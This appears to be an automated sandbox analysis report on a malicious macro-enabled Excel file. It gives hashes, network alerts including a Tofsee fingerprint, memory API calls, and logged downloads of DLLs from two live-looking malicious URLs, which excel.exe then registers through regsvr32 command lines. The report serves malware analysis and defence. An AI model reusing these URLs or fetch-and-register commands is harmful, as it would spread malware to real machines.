popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

research-453468889.xlsm

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 June 11, 2021, 12:25 p.m. June 11, 2021, 12:32 p.m.
Size 178.5KB
Type Microsoft Excel 2007+
MD5 11465058b522cd71f419238bd897a2f1
SHA256 48effc21ccb3c741305df3e4a886c96429375856d6591bf1603caf90d405c657
CRC32 1439F62B
ssdeep 3072:rLmZz+X+dDdTkdm3bGeAxidxVymd1xXPMU9VlUBWA6CFvA7bRCxAVIKDbAX:38TkeGKdxVyWxfMU3liWA6FsYE
Yara None matched

Name Response Post-Analysis Lookup
keema.tk
A 207.174.212.247
207.174.212.247
birliklpgotogaz.com
A 46.31.79.106
46.31.79.106
IP Address Status Action
142.250.204.67 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
207.174.212.247 Active Moloch
46.31.79.106 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:57660 -> 164.124.101.2:53 2012811 ET DNS Query to a .tk domain - Likely Hostile Potentially Bad Traffic
TCP 207.174.212.247:443 -> 192.168.56.102:49809 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49808 -> 207.174.212.247:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49806 -> 207.174.212.247:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49814 -> 46.31.79.106:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 46.31.79.106:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 46.31.79.106:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 46.31.79.106:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 46.31.79.106:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 46.31.79.106:443 -> 192.168.56.102:49811 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 46.31.79.106:443 -> 192.168.56.102:49814 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 46.31.79.106:443 -> 192.168.56.102:49811 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 46.31.79.106:443 -> 192.168.56.102:49814 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49812 -> 46.31.79.106:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.102:49812 -> 46.31.79.106:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.102:49812 -> 46.31.79.106:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 46.31.79.106:443 -> 192.168.56.102:49812 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 46.31.79.106:443 -> 192.168.56.102:49812 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1836
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ea0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1836
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ea0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1836
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1836
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ed0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$research-453468889.xlsm
file C:\Users\test22\jordji2.dll
file C:\Users\test22\jordji1.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000398
filepath: C:\Users\test22\AppData\Local\Temp\~$research-453468889.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$research-453468889.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 -s ..\jordji1.dll
cmdline regsvr32 -s ..\jordji2.dll
host 142.250.204.67
host 172.217.25.14
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: https://keema.tk/SrJfCix7DHn/zv.html
stack_pivoted: 0
filepath_r: ..\jordji1.dll
filepath: C:\Users\test22\jordji1.dll
2148270085 0

URLDownloadToFileW

 url: https://birliklpgotogaz.com/05JQwseTb/zv.html
stack_pivoted: 0
filepath_r: ..\jordji2.dll
filepath: C:\Users\test22\jordji2.dll
2148270085 0
parent_process excel.exe martian_process regsvr32 -s ..\jordji1.dll
parent_process excel.exe martian_process regsvr32 -s ..\jordji2.dll
dead_host 192.168.56.102:49826